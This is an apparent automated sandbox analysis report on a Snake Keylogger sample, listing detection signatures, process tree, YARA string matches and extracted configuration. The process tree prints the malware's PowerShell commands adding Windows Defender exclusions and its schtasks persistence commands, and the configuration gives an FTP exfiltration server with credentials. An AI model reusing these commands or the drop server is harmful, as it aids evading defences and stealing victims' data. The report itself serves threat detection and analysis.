Edit tour

Windows Analysis Report
hesaphareketi-01.exe

Overview

General Information

Sample name:	hesaphareketi-01.exe
Analysis ID:	1550346
MD5:	fb1ddd3d10ca671f437c6f2f3c9d6e57
SHA1:	7bd24b6b4a1e30c7bd2ec0cfbe886021a902c912
SHA256:	49917f413cbf883715a5f6e5a30cb13abafc693ec296751ba8b1bdbc3142e8c5
Tags:	exegeoSnakeKeyloggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

hesaphareketi-01.exe (PID: 5392 cmdline: "C:\Users\user\Desktop\hesaphareketi-01.exe" MD5: FB1DDD3D10CA671F437C6F2F3C9D6E57)

powershell.exe (PID: 5964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7344 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 6524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WvaGpcFVX.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3152 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WvaGpcFVX.exe (PID: 7304 cmdline: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe MD5: FB1DDD3D10CA671F437C6F2F3C9D6E57)

schtasks.exe (PID: 7552 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp5A94.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7628 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 7636 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "FTP", "FTP Server": "ftp://50.31.176.103/", "FTP Username": "somac@gdmaduanas.com", "Password": "HW=f09RQ-BL1", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14826:$a1: get_encryptedPassword 0x14b12:$a2: get_encryptedUsername 0x14632:$a3: get_timePasswordChanged 0x1472d:$a4: get_passwordField 0x1483c:$a5: set_encryptedPassword 0x15e60:$a7: get_logins 0x15dc3:$a10: KeyLoggerEventArgs 0x15a2e:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19797:$x1: $%SMTPDV$ 0x18178:$x2: $#TheHashHere%& 0x18124:$x3: %FTPDV$ 0x1986d:$x4: $%TelegramDv$ 0x15a2e:$x5: KeyLoggerEventArgs 0x15dc3:$x5: KeyLoggerEventArgs 0x19763:$m2: Clipboard Logs ID 0x199bd:$m2: Screenshot Logs ID 0x19acd:$m2: keystroke Logs ID 0x19da7:$m3: SnakePW 0x19995:$m4: \SnakeKeylogger\
0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x153d6:$a1: get_encryptedPassword 0x156c2:$a2: get_encryptedUsername 0x151e2:$a3: get_timePasswordChanged 0x152dd:$a4: get_passwordField 0x153ec:$a5: set_encryptedPassword 0x16a10:$a7: get_logins 0x16973:$a10: KeyLoggerEventArgs 0x165de:$a11: KeyLoggerEventArgsEventHandler
0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1a347:$x1: $%SMTPDV$ 0x18d28:$x2: $#TheHashHere%& 0x18cd4:$x3: %FTPDV$ 0x1a41d:$x4: $%TelegramDv$ 0x165de:$x5: KeyLoggerEventArgs 0x16973:$x5: KeyLoggerEventArgs 0x1a313:$m2: Clipboard Logs ID 0x1a56d:$m2: Screenshot Logs ID 0x1a67d:$m2: keystroke Logs ID 0x1a957:$m3: SnakePW 0x1a545:$m4: \SnakeKeylogger\
00000010.00000002.4701852091.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.4701100037.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.4701100037.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.4701852091.00000000030B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x15016:$a1: get_encryptedPassword 0x35836:$a1: get_encryptedPassword 0x15302:$a2: get_encryptedUsername 0x35b22:$a2: get_encryptedUsername 0x14e22:$a3: get_timePasswordChanged 0x35642:$a3: get_timePasswordChanged 0x14f1d:$a4: get_passwordField 0x3573d:$a4: get_passwordField 0x1502c:$a5: set_encryptedPassword 0x3584c:$a5: set_encryptedPassword 0x16650:$a7: get_logins 0x36e70:$a7: get_logins 0x165b3:$a10: KeyLoggerEventArgs 0x36dd3:$a10: KeyLoggerEventArgs 0x1621e:$a11: KeyLoggerEventArgsEventHandler 0x36a3e:$a11: KeyLoggerEventArgsEventHandler
0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19f87:$x1: $%SMTPDV$ 0x3a7a7:$x1: $%SMTPDV$ 0x18968:$x2: $#TheHashHere%& 0x39188:$x2: $#TheHashHere%& 0x18914:$x3: %FTPDV$ 0x39134:$x3: %FTPDV$ 0x1a05d:$x4: $%TelegramDv$ 0x3a87d:$x4: $%TelegramDv$ 0x1621e:$x5: KeyLoggerEventArgs 0x165b3:$x5: KeyLoggerEventArgs 0x36a3e:$x5: KeyLoggerEventArgs 0x36dd3:$x5: KeyLoggerEventArgs 0x19f53:$m2: Clipboard Logs ID 0x1a1ad:$m2: Screenshot Logs ID 0x1a2bd:$m2: keystroke Logs ID 0x3a773:$m2: Clipboard Logs ID 0x3a9cd:$m2: Screenshot Logs ID 0x3aadd:$m2: keystroke Logs ID 0x1a597:$m3: SnakePW 0x3adb7:$m3: SnakePW 0x1a185:$m4: \SnakeKeylogger\
00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x150c6:$a1: get_encryptedPassword 0x35ae6:$a1: get_encryptedPassword 0x56306:$a1: get_encryptedPassword 0x153b2:$a2: get_encryptedUsername 0x35dd2:$a2: get_encryptedUsername 0x565f2:$a2: get_encryptedUsername 0x14ed2:$a3: get_timePasswordChanged 0x358f2:$a3: get_timePasswordChanged 0x56112:$a3: get_timePasswordChanged 0x14fcd:$a4: get_passwordField 0x359ed:$a4: get_passwordField 0x5620d:$a4: get_passwordField 0x150dc:$a5: set_encryptedPassword 0x35afc:$a5: set_encryptedPassword 0x5631c:$a5: set_encryptedPassword 0x16700:$a7: get_logins 0x37120:$a7: get_logins 0x57940:$a7: get_logins 0x16663:$a10: KeyLoggerEventArgs 0x37083:$a10: KeyLoggerEventArgs 0x578a3:$a10: KeyLoggerEventArgs
00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1a037:$x1: $%SMTPDV$ 0x3aa57:$x1: $%SMTPDV$ 0x5b277:$x1: $%SMTPDV$ 0x18a18:$x2: $#TheHashHere%& 0x39438:$x2: $#TheHashHere%& 0x59c58:$x2: $#TheHashHere%& 0x189c4:$x3: %FTPDV$ 0x393e4:$x3: %FTPDV$ 0x59c04:$x3: %FTPDV$ 0x1a10d:$x4: $%TelegramDv$ 0x3ab2d:$x4: $%TelegramDv$ 0x5b34d:$x4: $%TelegramDv$ 0x162ce:$x5: KeyLoggerEventArgs 0x16663:$x5: KeyLoggerEventArgs 0x36cee:$x5: KeyLoggerEventArgs 0x37083:$x5: KeyLoggerEventArgs 0x5750e:$x5: KeyLoggerEventArgs 0x578a3:$x5: KeyLoggerEventArgs 0x1a003:$m2: Clipboard Logs ID 0x1a25d:$m2: Screenshot Logs ID 0x1a36d:$m2: keystroke Logs ID
00000009.00000002.4701100037.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.4701852091.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: hesaphareketi-01.exe PID: 5392	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: hesaphareketi-01.exe PID: 5392	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: hesaphareketi-01.exe PID: 5392	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: hesaphareketi-01.exe PID: 5392	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x54314:$a1: get_encryptedPassword 0x545f6:$a2: get_encryptedUsername 0x5412a:$a3: get_timePasswordChanged 0x54225:$a4: get_passwordField 0x5432a:$a5: set_encryptedPassword 0x56801:$a7: get_logins 0x56764:$a10: KeyLoggerEventArgs 0x563cf:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: hesaphareketi-01.exe PID: 5392	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x563cf:$x5: KeyLoggerEventArgs 0x56764:$x5: KeyLoggerEventArgs 0x5706b:$x5: KeyLoggerEventArgs 0x573cc:$x5: KeyLoggerEventArgs 0x5898b:$m2: Clipboard Logs ID 0x58a9f:$m2: Screenshot Logs ID 0x58af5:$m2: keystroke Logs ID 0x58c2a:$m3: SnakePW 0x58a8b:$m4: \SnakeKeylogger\
Process Memory Space: MSBuild.exe PID: 7200	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 7200	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: MSBuild.exe PID: 7200	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x593b:$a1: get_encryptedPassword 0x5c1d:$a2: get_encryptedUsername 0x5751:$a3: get_timePasswordChanged 0x584c:$a4: get_passwordField 0x5951:$a5: set_encryptedPassword 0x7e28:$a7: get_logins 0x7d8b:$a10: KeyLoggerEventArgs 0x79f6:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: MSBuild.exe PID: 7200	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x79f6:$x5: KeyLoggerEventArgs 0x7d8b:$x5: KeyLoggerEventArgs 0x8692:$x5: KeyLoggerEventArgs 0x89f3:$x5: KeyLoggerEventArgs 0x9fb2:$m2: Clipboard Logs ID 0xa0c6:$m2: Screenshot Logs ID 0xa11c:$m2: keystroke Logs ID 0xa251:$m3: SnakePW 0x35e74:$m3: SnakePW 0xa0b2:$m4: \SnakeKeylogger\
Process Memory Space: WvaGpcFVX.exe PID: 7304	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: WvaGpcFVX.exe PID: 7304	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: WvaGpcFVX.exe PID: 7304	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: WvaGpcFVX.exe PID: 7304	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7002:$a1: get_encryptedPassword 0x43735:$a1: get_encryptedPassword 0x72e4:$a2: get_encryptedUsername 0x43a17:$a2: get_encryptedUsername 0x6e18:$a3: get_timePasswordChanged 0x4354b:$a3: get_timePasswordChanged 0x6f13:$a4: get_passwordField 0x43646:$a4: get_passwordField 0x7018:$a5: set_encryptedPassword 0x4374b:$a5: set_encryptedPassword 0x94ef:$a7: get_logins 0x45c22:$a7: get_logins 0x9452:$a10: KeyLoggerEventArgs 0x45b85:$a10: KeyLoggerEventArgs 0x90bd:$a11: KeyLoggerEventArgsEventHandler 0x457f0:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: WvaGpcFVX.exe PID: 7304	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x90bd:$x5: KeyLoggerEventArgs 0x9452:$x5: KeyLoggerEventArgs 0x9d59:$x5: KeyLoggerEventArgs 0xa0ba:$x5: KeyLoggerEventArgs 0x457f0:$x5: KeyLoggerEventArgs 0x45b85:$x5: KeyLoggerEventArgs 0x4648c:$x5: KeyLoggerEventArgs 0x467ed:$x5: KeyLoggerEventArgs 0xb679:$m2: Clipboard Logs ID 0xb78d:$m2: Screenshot Logs ID 0xb7e3:$m2: keystroke Logs ID 0x47dac:$m2: Clipboard Logs ID 0x47ec0:$m2: Screenshot Logs ID 0x47f16:$m2: keystroke Logs ID 0xb918:$m3: SnakePW 0x4804b:$m3: SnakePW 0xb779:$m4: \SnakeKeylogger\ 0x47eac:$m4: \SnakeKeylogger\
Process Memory Space: MSBuild.exe PID: 7636	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 7636	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 33 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.WvaGpcFVX.exe.45999b0.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.WvaGpcFVX.exe.45999b0.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
10.2.WvaGpcFVX.exe.45999b0.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c26:$a1: get_encryptedPassword 0x12f12:$a2: get_encryptedUsername 0x12a32:$a3: get_timePasswordChanged 0x12b2d:$a4: get_passwordField 0x12c3c:$a5: set_encryptedPassword 0x14260:$a7: get_logins 0x141c3:$a10: KeyLoggerEventArgs 0x13e2e:$a11: KeyLoggerEventArgsEventHandler
10.2.WvaGpcFVX.exe.45999b0.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x197d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c06:$a4: \Orbitum\User Data\Default\Login Data 0x1ac45:$a5: \Kometa\User Data\Default\Login Data
10.2.WvaGpcFVX.exe.45999b0.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137de:$s1: UnHook 0x137e5:$s2: SetHook 0x137ed:$s3: CallNextHook 0x137fa:$s4: _hook
10.2.WvaGpcFVX.exe.45999b0.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17b97:$x1: $%SMTPDV$ 0x16578:$x2: $#TheHashHere%& 0x16524:$x3: %FTPDV$ 0x17c6d:$x4: $%TelegramDv$ 0x13e2e:$x5: KeyLoggerEventArgs 0x141c3:$x5: KeyLoggerEventArgs 0x17b63:$m2: Clipboard Logs ID 0x17dbd:$m2: Screenshot Logs ID 0x17ecd:$m2: keystroke Logs ID 0x181a7:$m3: SnakePW 0x17d95:$m4: \SnakeKeylogger\
0.2.hesaphareketi-01.exe.449e0c0.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.hesaphareketi-01.exe.449e0c0.4.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.hesaphareketi-01.exe.449e0c0.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c26:$a1: get_encryptedPassword 0x12f12:$a2: get_encryptedUsername 0x12a32:$a3: get_timePasswordChanged 0x12b2d:$a4: get_passwordField 0x12c3c:$a5: set_encryptedPassword 0x14260:$a7: get_logins 0x141c3:$a10: KeyLoggerEventArgs 0x13e2e:$a11: KeyLoggerEventArgsEventHandler
0.2.hesaphareketi-01.exe.449e0c0.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x197d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c06:$a4: \Orbitum\User Data\Default\Login Data 0x1ac45:$a5: \Kometa\User Data\Default\Login Data
0.2.hesaphareketi-01.exe.449e0c0.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137de:$s1: UnHook 0x137e5:$s2: SetHook 0x137ed:$s3: CallNextHook 0x137fa:$s4: _hook
0.2.hesaphareketi-01.exe.449e0c0.4.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17b97:$x1: $%SMTPDV$ 0x16578:$x2: $#TheHashHere%& 0x16524:$x3: %FTPDV$ 0x17c6d:$x4: $%TelegramDv$ 0x13e2e:$x5: KeyLoggerEventArgs 0x141c3:$x5: KeyLoggerEventArgs 0x17b63:$m2: Clipboard Logs ID 0x17dbd:$m2: Screenshot Logs ID 0x17ecd:$m2: keystroke Logs ID 0x181a7:$m3: SnakePW 0x17d95:$m4: \SnakeKeylogger\
10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a26:$a1: get_encryptedPassword 0x14d12:$a2: get_encryptedUsername 0x14832:$a3: get_timePasswordChanged 0x1492d:$a4: get_passwordField 0x14a3c:$a5: set_encryptedPassword 0x16060:$a7: get_logins 0x15fc3:$a10: KeyLoggerEventArgs 0x15c2e:$a11: KeyLoggerEventArgsEventHandler
10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b5d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba06:$a4: \Orbitum\User Data\Default\Login Data 0x1ca45:$a5: \Kometa\User Data\Default\Login Data
10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155de:$s1: UnHook 0x155e5:$s2: SetHook 0x155ed:$s3: CallNextHook 0x155fa:$s4: _hook
10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19997:$x1: $%SMTPDV$ 0x18378:$x2: $#TheHashHere%& 0x18324:$x3: %FTPDV$ 0x19a6d:$x4: $%TelegramDv$ 0x15c2e:$x5: KeyLoggerEventArgs 0x15fc3:$x5: KeyLoggerEventArgs 0x19963:$m2: Clipboard Logs ID 0x19bbd:$m2: Screenshot Logs ID 0x19ccd:$m2: keystroke Logs ID 0x19fa7:$m3: SnakePW 0x19b95:$m4: \SnakeKeylogger\
0.2.hesaphareketi-01.exe.447d6a0.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.hesaphareketi-01.exe.447d6a0.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.hesaphareketi-01.exe.447d6a0.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c26:$a1: get_encryptedPassword 0x12f12:$a2: get_encryptedUsername 0x12a32:$a3: get_timePasswordChanged 0x12b2d:$a4: get_passwordField 0x12c3c:$a5: set_encryptedPassword 0x14260:$a7: get_logins 0x141c3:$a10: KeyLoggerEventArgs 0x13e2e:$a11: KeyLoggerEventArgsEventHandler
0.2.hesaphareketi-01.exe.447d6a0.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x197d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c06:$a4: \Orbitum\User Data\Default\Login Data 0x1ac45:$a5: \Kometa\User Data\Default\Login Data
0.2.hesaphareketi-01.exe.447d6a0.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137de:$s1: UnHook 0x137e5:$s2: SetHook 0x137ed:$s3: CallNextHook 0x137fa:$s4: _hook
0.2.hesaphareketi-01.exe.447d6a0.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17b97:$x1: $%SMTPDV$ 0x16578:$x2: $#TheHashHere%& 0x16524:$x3: %FTPDV$ 0x17c6d:$x4: $%TelegramDv$ 0x13e2e:$x5: KeyLoggerEventArgs 0x141c3:$x5: KeyLoggerEventArgs 0x17b63:$m2: Clipboard Logs ID 0x17dbd:$m2: Screenshot Logs ID 0x17ecd:$m2: keystroke Logs ID 0x181a7:$m3: SnakePW 0x17d95:$m4: \SnakeKeylogger\
10.2.WvaGpcFVX.exe.467a5f0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.WvaGpcFVX.exe.467a5f0.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
10.2.WvaGpcFVX.exe.467a5f0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c26:$a1: get_encryptedPassword 0x12f12:$a2: get_encryptedUsername 0x12a32:$a3: get_timePasswordChanged 0x12b2d:$a4: get_passwordField 0x12c3c:$a5: set_encryptedPassword 0x14260:$a7: get_logins 0x141c3:$a10: KeyLoggerEventArgs 0x13e2e:$a11: KeyLoggerEventArgsEventHandler
10.2.WvaGpcFVX.exe.467a5f0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x197d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c06:$a4: \Orbitum\User Data\Default\Login Data 0x1ac45:$a5: \Kometa\User Data\Default\Login Data
10.2.WvaGpcFVX.exe.467a5f0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137de:$s1: UnHook 0x137e5:$s2: SetHook 0x137ed:$s3: CallNextHook 0x137fa:$s4: _hook
10.2.WvaGpcFVX.exe.467a5f0.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17b97:$x1: $%SMTPDV$ 0x16578:$x2: $#TheHashHere%& 0x16524:$x3: %FTPDV$ 0x17c6d:$x4: $%TelegramDv$ 0x13e2e:$x5: KeyLoggerEventArgs 0x141c3:$x5: KeyLoggerEventArgs 0x17b63:$m2: Clipboard Logs ID 0x17dbd:$m2: Screenshot Logs ID 0x17ecd:$m2: keystroke Logs ID 0x181a7:$m3: SnakePW 0x17d95:$m4: \SnakeKeylogger\
10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
